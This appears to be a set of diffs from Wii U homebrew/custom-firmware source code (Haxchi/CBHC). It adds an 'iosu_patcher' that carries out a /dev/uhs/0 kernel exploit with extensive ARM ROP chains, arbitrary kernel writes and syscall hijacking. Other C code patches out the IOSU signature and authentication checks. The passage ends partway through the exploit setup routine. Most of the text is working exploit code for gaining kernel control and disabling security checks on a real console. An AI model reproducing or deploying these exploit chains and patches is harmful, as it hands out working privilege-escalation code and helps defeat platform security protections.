call_func MEMCPY, SELECTOR_ADDRESS, code, code_end - code, 0x0 call_func MEMCPY, IOSU_PATCHER_ADR, iosu_patcher, iosu_patcher_end - iosu_patcher, 0x0
call_func MEMCPY, CFW_BOOTER_ADR, cfw_booter, cfw_booter_end - cfw_booter, 0x0 call_func MEMCPY, SELECTOR_ADDRESS, option_select, option_select_end - option_select, 0x0
call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xE000, 0x0, 0x0 call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
; switch codegen to RX ; switch codegen to RX
call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0 call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0
call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xE000, 0x0, 0x0 call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
; execute option_select in codegen ; execute option_select in codegen
.word SELECTOR_ADDRESS .word SELECTOR_ADDRESS
@ -260,16 +260,16 @@ rop_start:
.word 0x00000010 ; thread prio .word 0x00000010 ; thread prio
.halfword 0x0004 ; thread affinity (core2) .halfword 0x0004 ; thread affinity (core2)
code:
.incbin "code550.bin"
code_end:
hbl_loader: hbl_loader:
.incbin "hbl_loader.bin" .incbin "hbl_loader.bin"
hbl_loader_end: hbl_loader_end:
cfw_booter: iosu_patcher:
.incbin "cfw_booter.bin" .incbin "iosu_patcher.bin"
cfw_booter_end: iosu_patcher_end:
option_select:
.incbin "option_select.bin"
option_select_end:
.Close .Close

View File

@ -3,7 +3,8 @@
; more useful definitions ; more useful definitions
HBL_LOADER_ADR equ (0x01800000) HBL_LOADER_ADR equ (0x01800000)
CBHC_ADDR equ (0x01808000) IOSU_PATCHER_ADR equ (0x01804000)
CBHC_MENU_ADDR equ (0x01808000)
NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000) NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000)
NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000) NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000)
@ -223,15 +224,16 @@ rop_start:
; memcpy code ; memcpy code
call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0 call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0
call_func MEMCPY, CBHC_ADDR, cbhc, cbhc_end - cbhc, 0x0 call_func MEMCPY, IOSU_PATCHER_ADR, iosu_patcher, iosu_patcher_end - iosu_patcher, 0x0
call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xFFE0, 0x0, 0x0 call_func MEMCPY, CBHC_MENU_ADDR, cbhc_menu, cbhc_menu_end - cbhc_menu, 0x0
call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
; switch codegen to RX ; switch codegen to RX
call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0 call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0
call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xFFE0, 0x0, 0x0 call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
; execute option_select in codegen ; execute option_select in codegen
.word CBHC_ADDR .word CBHC_MENU_ADDR
core0rop_end: core0rop_end:
; core 0 thread params ; core 0 thread params
@ -262,8 +264,12 @@ rop_start:
.incbin "hbl_loader.bin" .incbin "hbl_loader.bin"
hbl_loader_end: hbl_loader_end:
cbhc: iosu_patcher:
.incbin "cbhc.bin" .incbin "iosu_patcher.bin"
cbhc_end: iosu_patcher_end:
cbhc_menu:
.incbin "cbhc_menu.bin"
cbhc_menu_end:
.Close .Close

View File

@ -6,7 +6,7 @@ CFLAGS = -std=gnu89 -O3 -Wall -nostdinc -fno-builtin -I$(DEVKITPPC)/lib/gcc/powe
ASFLAGS = -mregnames -x assembler-with-cpp ASFLAGS = -mregnames -x assembler-with-cpp
LD = $(PREFIX)ld LD = $(PREFIX)ld
OBJCOPY = $(PREFIX)objcopy OBJCOPY = $(PREFIX)objcopy
LDFLAGS=-Ttext 1808000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc LDFLAGS=-Ttext 1804000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc
OBJDUMP ?= $(PREFIX)objdump OBJDUMP ?= $(PREFIX)objdump
project := . project := .
root := $(CURDIR) root := $(CURDIR)
@ -44,12 +44,12 @@ main: $(CURDIR)/payload/arm_kernel_bin.h
$(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S
cp -r $(root)/*.o $(build) cp -r $(root)/*.o $(build)
rm $(root)/*.o rm $(root)/*.o
$(LD) -o CBHC.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map CBHC.map $(LD) -o iosu_patcher.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map iosu_patcher.map
$(OBJCOPY) CBHC.elf -S -O binary ../CBHC.bin $(OBJCOPY) iosu_patcher.elf -S -O binary ../iosu_patcher.bin
clean: clean:
rm -rf $(build) payload rm -rf $(build) payload
rm -rf CBHC.elf CBHC.map rm -rf iosu_patcher.elf iosu_patcher.map
$(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile clean $(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile clean
$(MAKE) --no-print-directory -C $(CURDIR)/titleprot -f $(CURDIR)/titleprot/Makefile clean $(MAKE) --no-print-directory -C $(CURDIR)/titleprot -f $(CURDIR)/titleprot/Makefile clean
$(MAKE) --no-print-directory -C $(CURDIR)/../../wupserver -f $(CURDIR)/../../wupserver/Makefile clean $(MAKE) --no-print-directory -C $(CURDIR)/../../wupserver -f $(CURDIR)/../../wupserver/Makefile clean

View File

@ -1,6 +1,9 @@
#include "../../payload/titleprot_bin.h" #include "../../payload/titleprot_bin.h"
#include "../../payload/wupserver_bin.h" #include "../../payload/wupserver_bin.h"
//not really a bin but still a const val
const int from_cbhc = 1;
const unsigned char *get_titleprot_bin() const unsigned char *get_titleprot_bin()
{ {
return titleprot_bin; return titleprot_bin;

View File

@ -4,6 +4,7 @@
#include "elf_patcher.h" #include "elf_patcher.h"
#include "../../payload/arm_user_bin.h" #include "../../payload/arm_user_bin.h"
#include "getbins.h" #include "getbins.h"
static const char repairData_set_fault_behavior[] = { static const char repairData_set_fault_behavior[] = {
0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, 0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00,
0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, 0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02,
@ -41,7 +42,7 @@ static const char os_launch_hook[] = {
0x05, 0x0b, 0xcf, 0xfc, 0x05, 0x05, 0x99, 0x70, 0x05, 0x05, 0x99, 0x7e, 0x05, 0x0b, 0xcf, 0xfc, 0x05, 0x05, 0x99, 0x70, 0x05, 0x05, 0x99, 0x7e,
}; };
static const char sd_path[] = "/vol/sdcard"; extern const int from_cbhc;
#define LAUNCH_SYSMENU 0 #define LAUNCH_SYSMENU 0
#define LAUNCH_HBL 1 #define LAUNCH_HBL 1
@ -63,8 +64,11 @@ int _main()
/* copy in ds vc title id to protect from moving/deleting */ /* copy in ds vc title id to protect from moving/deleting */
kernel_memcpy((void*)(get_titleprot_bin()+get_titleprot_bin_len()-8), (void*)0x01E70108, 4); kernel_memcpy((void*)(get_titleprot_bin()+get_titleprot_bin_len()-8), (void*)0x01E70108, 4);
/* get value CBHC used to boot up */ /* save if we are booted from CBHC */
unsigned int launchmode = *(volatile u32*)0x01E7010C; kernel_memcpy((void*)(&from_cbhc), (void*)0x01E70110, 4);
/* get value CBHC or Haxchi used to boot up */
unsigned int launchmode = *(volatile int*)0x01E7010C;
/* Save the request handle so we can reply later */ /* Save the request handle so we can reply later */
*(volatile u32*)0x01E10000 = *(volatile u32*)0x1016AD18; *(volatile u32*)0x01E10000 = *(volatile u32*)0x1016AD18;
@ -95,7 +99,10 @@ int _main()
// patch OS launch sig check // patch OS launch sig check
*(volatile u32*)(0x0500A818 - 0x05000000 + 0x081C0000) = 0x20002000; // mov r0, #0; mov r0, #0 *(volatile u32*)(0x0500A818 - 0x05000000 + 0x081C0000) = 0x20002000; // mov r0, #0; mov r0, #0
}
if(launchmode != LAUNCH_MOCHA && launchmode != LAUNCH_CFW_IMG)
{
// patch MCP authentication check // patch MCP authentication check
*(volatile u32*)(0x05014CAC - 0x05000000 + 0x081C0000) = 0x20004770; // mov r0, #0; bx lr *(volatile u32*)(0x05014CAC - 0x05000000 + 0x081C0000) = 0x20004770; // mov r0, #0; bx lr
@ -120,12 +127,15 @@ int _main()
*(volatile u32*)(0x05054D6C - 0x05000000 + 0x081C0000) = 0xE3A00000; // mov r0, 0 *(volatile u32*)(0x05054D6C - 0x05000000 + 0x081C0000) = 0xE3A00000; // mov r0, 0
*(volatile u32*)(0x05054D70 - 0x05000000 + 0x081C0000) = 0xE12FFF1E; // bx lr *(volatile u32*)(0x05054D70 - 0x05000000 + 0x081C0000) = 0xE12FFF1E; // bx lr
if(from_cbhc) // coldboot specific patches
{
// change system.xml to syshax.xml // change system.xml to syshax.xml
*(volatile u32*)(0x050600F0 - 0x05060000 + 0x08220000) = 0x79736861; // ysha *(volatile u32*)(0x050600F0 - 0x05060000 + 0x08220000) = 0x79736861; // ysha
*(volatile u32*)(0x050600F4 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm *(volatile u32*)(0x050600F4 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm
*(volatile u32*)(0x05060114 - 0x05060000 + 0x08220000) = 0x79736861; // ysha *(volatile u32*)(0x05060114 - 0x05060000 + 0x08220000) = 0x79736861; // ysha
*(volatile u32*)(0x05060118 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm *(volatile u32*)(0x05060118 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm
}
// jump to titleprot code (titleprot_addr+4) // jump to titleprot code (titleprot_addr+4)
*(volatile u32*)(0x05107F70 - 0x05100000 + 0x13D80000) = 0xF005FD0A; //bl (titleprot_addr+4) *(volatile u32*)(0x05107F70 - 0x05100000 + 0x13D80000) = 0xF005FD0A; //bl (titleprot_addr+4)
@ -157,8 +167,8 @@ int _main()
{ {
int i; int i;
for (i = 0; i < 32; i++) for (i = 0; i < 32; i++)
if (i < 11) if (i < 31)
((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = sd_path[i]; ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = ((char*)0x01E70000)[i];
else else
((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = (char)0; ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = (char)0;
@ -168,12 +178,15 @@ int _main()
((char*)(0x05059938 - 0x05000000 + 0x081C0000))[i] = os_launch_hook[i]; ((char*)(0x05059938 - 0x05000000 + 0x081C0000))[i] = os_launch_hook[i];
} }
if(from_cbhc) // coldboot specific patches
{
// patch default title id to system menu // patch default title id to system menu
*(volatile u32*)(0x050B817C - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70100; *(volatile u32*)(0x050B817C - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70100;
*(volatile u32*)(0x050B8180 - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70104; *(volatile u32*)(0x050B8180 - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70104;
// force check USB storage on load // force check USB storage on load
*(volatile u32*)(0xE012202C - 0xE0000000 + 0x12900000) = 0x00000001; // find USB flag *(volatile u32*)(0xE012202C - 0xE0000000 + 0x12900000) = 0x00000001; // find USB flag
}
*(volatile u32*)(0x1555500) = 0; *(volatile u32*)(0x1555500) = 0;

View File

@ -6,6 +6,7 @@
#include "getbins.h" #include "getbins.h"
extern char __file_start, __file_end; extern char __file_start, __file_end;
extern const int from_cbhc;
void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H)
{ {
@ -54,12 +55,15 @@ void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H)
section_write_word(ios_elf_start, 0x05054D6C, 0xE3A00000); // mov r0, 0 section_write_word(ios_elf_start, 0x05054D6C, 0xE3A00000); // mov r0, 0
section_write_word(ios_elf_start, 0x05054D70, 0xE12FFF1E); // bx lr section_write_word(ios_elf_start, 0x05054D70, 0xE12FFF1E); // bx lr
if(from_cbhc) // coldboot specific patches
{
// change system.xml to syshax.xml // change system.xml to syshax.xml
section_write_word(ios_elf_start, 0x050600F0, 0x79736861); // ysha section_write_word(ios_elf_start, 0x050600F0, 0x79736861); // ysha
section_write_word(ios_elf_start, 0x050600F4, 0x782E786D); // x.xm section_write_word(ios_elf_start, 0x050600F4, 0x782E786D); // x.xm
section_write_word(ios_elf_start, 0x05060114, 0x79736861); // ysha section_write_word(ios_elf_start, 0x05060114, 0x79736861); // ysha
section_write_word(ios_elf_start, 0x05060118, 0x782E786D); // x.xm section_write_word(ios_elf_start, 0x05060118, 0x782E786D); // x.xm
}
// jump to titleprot code (titleprot_addr+4) // jump to titleprot code (titleprot_addr+4)
section_write_word(ios_elf_start, 0x05107F70, 0xF005FD0A); //bl (titleprot_addr+4) section_write_word(ios_elf_start, 0x05107F70, 0xF005FD0A); //bl (titleprot_addr+4)

View File

@ -0,0 +1,6 @@
.extern patch_iosu
.globl _start
_start:
b patch_iosu

388
dsrom/iosu_patcher/main.c Normal file
View File

@ -0,0 +1,388 @@
/*
* Copyright (C) 2016 FIX94
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
#include <string.h>
#include "types.h"
#include "coreinit.h"
#include "../global.h"
#define CHAIN_START 0x1016AD40
#define SHUTDOWN 0x1012EE4C
#define SIMPLE_RETURN 0x101014E4
#define SOURCE 0x01E20000
#define IOS_CREATETHREAD 0x1012EABC
#define ARM_CODE_BASE 0x08135000
#define REPLACE_SYSCALL 0x081298BC
/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */
#include "payload/arm_kernel_bin.h"
#include "payload/arm_user_bin.h"
static void uhs_exploit_init(unsigned int coreinit_handle);
static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val);
void patch_iosu(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc)
{
unsigned long long(*_SYSGetSystemApplicationTitleId)(int sysApp);
OSDynLoad_FindExport(sysapp_handle,0,"_SYSGetSystemApplicationTitleId",&_SYSGetSystemApplicationTitleId);
unsigned long long sysmenu = _SYSGetSystemApplicationTitleId(0);
unsigned long long(*OSGetTitleID)();
OSDynLoad_FindExport(coreinit_handle, 0, "OSGetTitleID", &OSGetTitleID);
unsigned int dsvcid = (unsigned int)(OSGetTitleID(0) & 0xFFFFFFFF);
void (*DCStoreRange)(const void *addr, uint32_t length);
OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
memcpy((void*)0xF5E70100, &sysmenu, 8);
*(volatile unsigned int*)0xF5E70108 = dsvcid;
*(volatile unsigned int*)0xF5E7010C = launchmode;
*(volatile unsigned int*)0xF5E70110 = from_cbhc;
DCStoreRange((void*)0xF5E70100, 0x20);
int (*IOS_Open)(char *path, unsigned int mode);
int (*IOS_Close)(int fd);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close);
int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node
uhs_exploit_init(coreinit_handle); //! Init variables for the exploit
//!------ROP CHAIN-------
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC}
IOS_Close(dev_uhs_0_handle);
}
/* ROP CHAIN STARTS HERE (0x1015BD78) */
static const int final_chain[] = {
0x101236f3, // 0x00 POP {R1-R7,PC}
0x0, // 0x04 arg
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
0x68, // 0x0C stacksize
0x10101638, // 0x10
0x0, // 0x14
0x0, // 0x18
0x0, // 0x1C
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x30
0x0, // 0x34
IOS_CREATETHREAD, // 0x38
0x1, // 0x3C
0x2, // 0x40
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE92D4010, // 0x4C value: PUSH {R4,LR}
0x0, // 0x50
0x10123a8b, // 0x54 POP {R3,R4,PC}
0x1, // 0x58 R3 must be 1 for the arbitrary write
0x0, // 0x5C
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x64
0x0, // 0x68
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
0x0, // 0x70
0x0, // 0x74
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A04000, // 0x80 value: MOV R4, R0
0x0, // 0x84
0x10123a8b, // 0x88 POP {R3,R4,PC}
0x1, // 0x8C R3 must be 1 for the arbitrary write
0x0, // 0x90
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x98
0x0, // 0x9C
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
0x0, // 0xA4
0x0, // 0xA8
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
0x0, // 0xB8
0x10123a8b, // 0xBC POP {R3,R4,PC}
0x1, // 0xC0 R3 must be 1 for the arbitrary write
0x0, // 0xC4
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0xCC
0x0, // 0xD0
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
0x0, // 0xD8
0x0, // 0xDC
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
0x0, // 0xEC
0x10123a8b, // 0xF0 POP {R3,R4,PC}
0x1, // 0xF4 R3 must be 1 for the arbitrary write
0x0, // 0xF8
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x100
0x0, // 0x104
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
0x0, // 0x10C
0x0, // 0x110
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A00004, // 0x11C value: MOV R0, R4
0x0, // 0x120
0x10123a8b, // 0x124 POP {R3,R4,PC}
0x1, // 0x128 R3 must be 1 for the arbitrary write
0x0, // 0x12C
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x134
0x0, // 0x138
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
0x0, // 0x140
0x0, // 0x144
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x00000000, // 0x150 value: NOP
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x1AFFFFFD, // 0x150 value: BNE clean_loop
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A03004, // 0x184 value: MOV R3, R4
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE8BD4010, // 0x184 value: POP {R4,LR}
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
0x0, // 0x1BC
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
0x0, // 0x1C8
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x1D0
0x0, // 0x1D4
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
0x0, // 0x1E0
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
ARM_CODE_BASE, // 0x1E8 our code destination address
0x0, // 0x1EC
0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8
sizeof(arm_kernel_bin), // 0x1FC our code size
0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x01E40000, // 0x208 our code source location
0x08131D04, // 0x20C KERNEL_MEMCPY address
0x0, // 0x210
0x0, // 0x214
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
0x0,
0x0,
0x101312D0,
};
static const int second_chain[] = {
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
0x0, // 0x08
0x0, // 0x0C
0x101063db, // 0x10 POP {R1,R2,R5,PC}
0x01E30000, // 0x14 source
sizeof(final_chain), // 0x18 length
0x0, // 0x1C
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x101236f3, // 0x2C POP {R1-R7,PC}
0x0, // 0x30 arg
0x101001DC, // 0x34 stackptr
0x68, // 0x38 stacksize
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
0x0, // 0x40
0x0, // 0x44
0x0, // 0x48
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x50
0x0, // 0x54
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x5C
0x0, // 0x60
IOS_CREATETHREAD, // 0x64
0x1, // 0x68 priority
0x2, // 0x6C flags
0x0, // 0x70
0x0, // 0x74
0x101063db, // 0x78 POP {R1,R2,R5,PC}
0x0, // 0x7C
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
0x0, // 0x84
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
0x0,
0x0,
0x0,
0x00110000 - 0x44, // 0x8C
0x00110010, // 0x90
0x0, // 0x94
0x0, // 0x98
0x0, // 0x9C
0x0, // 0xA0
0x0, // 0xA4
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
0x0,
0x0,
0x1012EA68, // 0xAC stack pivot
};
static void uhs_exploit_init(unsigned int coreinit_handle)
{
void (*DCStoreRange)(const void *addr, uint32_t length);
OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
//! Clear out our used MEM1 area
memset((void*)0xF5E00000, 0, 0x00070000);
DCStoreRange((void*)0xF5E00000, 0x00070000);
//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5E60640;
int *ayylmao = (int*)0xF5E00000;
//!-------------------------------------
ayylmao[5] = 1;
ayylmao[8] = 0x1E00000;
memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain));
memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain));
memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin));
